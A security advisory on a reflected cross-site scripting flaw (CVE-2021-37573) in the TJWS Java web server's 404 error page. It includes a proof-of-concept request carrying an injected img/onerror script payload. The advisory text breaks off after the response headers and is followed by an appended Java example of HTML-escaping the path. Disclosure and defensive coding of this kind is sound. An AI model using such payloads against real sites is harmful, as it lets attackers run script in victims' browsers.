-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2021-042
Product: Tiny Java Web Server and Servlet Container (TJWS)
Manufacturer: D. Rogatkin
Affected Versions: <= 1.115
Tested Versions: 1.107, 1.114
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2021-07-21
Solution Date: 2021-07-23
Public Disclosure: 2021-08-03
CVE Reference: CVE-2021-37573
Author of Advisory: Maurizio Ruchay, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Tiny Java Web Server and Servlet Container (TJWS) is a lightweight web server written in Java.

The manufacturer describes the product as follows (see [1]):

"The Miniature Java Web Server is built as a servlet container with HTTPD servlet providing standard Web server functionality."

Due to improper input validation, the application is vulnerable to a reflected cross-site scripting attack.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

It is possible to inject malicious JavaScript code into the server's error page "404 Page Not Found". The requested path is not properly validated or encoded before it is reflected into the page, so attacker-supplied markup is rendered and executed in a victim's browser.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following GET request shows how JavaScript code can be placed on the page:

===
HTTP request:

GET /te%3Cimg%20src=x%20onerror=alert(42)%3Est HTTP/1.1
[...]
Connection: close

HTTP response:

HTTP/1.1 404 test not found
server: D. Rogatkin's TJWS (+Android, JSR340, JSR356) https://github.com/drogatkin/TJWS2.git/Version 1.114
[...]
content-length: 338
connection: close
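The root cause is a 404 page that echoes the requested path into HTML without output encoding. The following is an added illustration, not TJWS code or the vendor's fix: a minimal 404 renderer that HTML-escapes the decoded path, run against an input modelled on the PoC path above. Class and method names are hypothetical.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;

public class SafeNotFoundPage {

    /** Escape the characters that can break out of HTML text or attribute context. */
    static String escapeHtml(String s) {
        StringBuilder sb = new StringBuilder(s.length());
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    /**
     * Build the 404 body. The raw request path is percent-decoded first (as a server
     * does before matching resources) and escaped only at the point of HTML output.
     * Note: URLDecoder also maps '+' to a space (form semantics); harmless here.
     */
    static String render404(String rawPath) {
        String decoded = URLDecoder.decode(rawPath, StandardCharsets.UTF_8);
        String safe = escapeHtml(decoded);
        return "<html><head><title>404 Not Found</title></head><body>"
             + "<h1>404 Not Found</h1><p>" + safe + " not found</p></body></html>";
    }

    public static void main(String[] args) {
        // Constructed input, shaped like the advisory's PoC request path.
        String path = "/te%3Cimg%20src=x%20onerror=alert(42)%3Est";
        String body = render404(path);
        System.out.println(body);
        // The decoded '<' and '>' must appear only as entities in the output.
        if (body.contains("<img") || !body.contains("&lt;img")) {
            throw new IllegalStateException("escaping failed");
        }
    }
}
```

The same escaping has to be applied to every place the path is reflected, including the status line text if it is ever rendered into a page; validation of the path alone (rejecting unexpected characters) is a useful defence in depth but not a substitute for output encoding.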